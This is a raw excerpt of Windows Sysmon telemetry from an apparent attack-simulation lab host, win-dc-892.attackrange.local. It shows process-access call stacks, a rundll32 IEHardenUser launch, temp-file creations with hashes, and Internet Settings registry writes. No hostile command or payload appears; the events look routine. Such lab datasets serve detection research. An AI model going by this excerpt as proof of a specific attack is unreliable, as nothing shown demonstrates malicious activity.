12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000005867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000005866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-64C5-6064-A700-00000000AE01}43884064C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000005865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.359{266CAFBE-64C5-6064-A700-00000000AE01}43884064C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000005864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.343{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64D0-6064-B400-00000000AE01}5196C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.343{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64D0-6064-B400-00000000AE01}5196C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.328{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5196C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.328{266CAFBE-64C5-6064-A500-00000000AE01}43561176C:\Windows\Explorer.EXE{00000000-0000-0000-0000-000000000000}5196C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+551d34|C:\Windows\System32\SHELL32.dll+551790|C:\Windows\System32\SHELL32.dll+551904|C:\Windows\System32\SHELL32.dll+22dcef|C:\Windows\System32\SHELL32.dll+f539d|C:\Windows\System32\SHELL32.dll+10d421 154100x80000000000000005860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.335{266CAFBE-64D0-6064-B400-00000000AE01}5196C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iesetup.dll",IEHardenUserC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 13241300x80000000000000005859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:24.312{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1809DWORD (0x00000000) 13241300x80000000000000005858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:24.312{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1206DWORD (0x00000003) 23542300x80000000000000005857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.312{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIAA0B.tmpMD5=A828B8C496779BDB61FCE06BA0D57C39,SHA256=C952F470A428D5D61ED52FB05C0143258687081E1AD13CFE6FF58037B375364D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.234{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIAA0B.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.219{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA9BC.tmpMD5=3006752A2BCFEDA0F75D551EA656B2EF,SHA256=DFD64231860C732DCED3DC78627A7844A08D5D3E4CD253FD81186BAE33CC368A,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:24.219{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500DWORD (0x00000000) 23542300x80000000000000005853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.188{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653B6096160EC57F7846E116D6C2D715,SHA256=4F2F1D265E00872B7BDE115BABD21E1FF0AA269ECA5F4C1D06B82F8B418C0625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.156{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA9BC.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.156{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA97C.tmpMD5=3006752A2BCFEDA0F75D551EA656B2EF,SHA256=DFD64231860C732DCED3DC78627A7844A08D5D3E4CD253FD81186BAE33CC368A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.094{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA97C.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.094{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA91E.tmpMD5=3006752A2BCFEDA0F75D551EA656B2EF,SHA256=DFD64231860C732DCED3DC78627A7844A08D5D3E4CD253FD81186BAE33CC368A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.001{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA91E.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.001{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA8DE.tmpMD5=3006752A2BCFEDA0F75D551EA656B2EF,SHA256=DFD64231860C732DCED3DC78627A7844A08D5D3E4CD253FD81186BAE33CC368A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.979{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.979{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 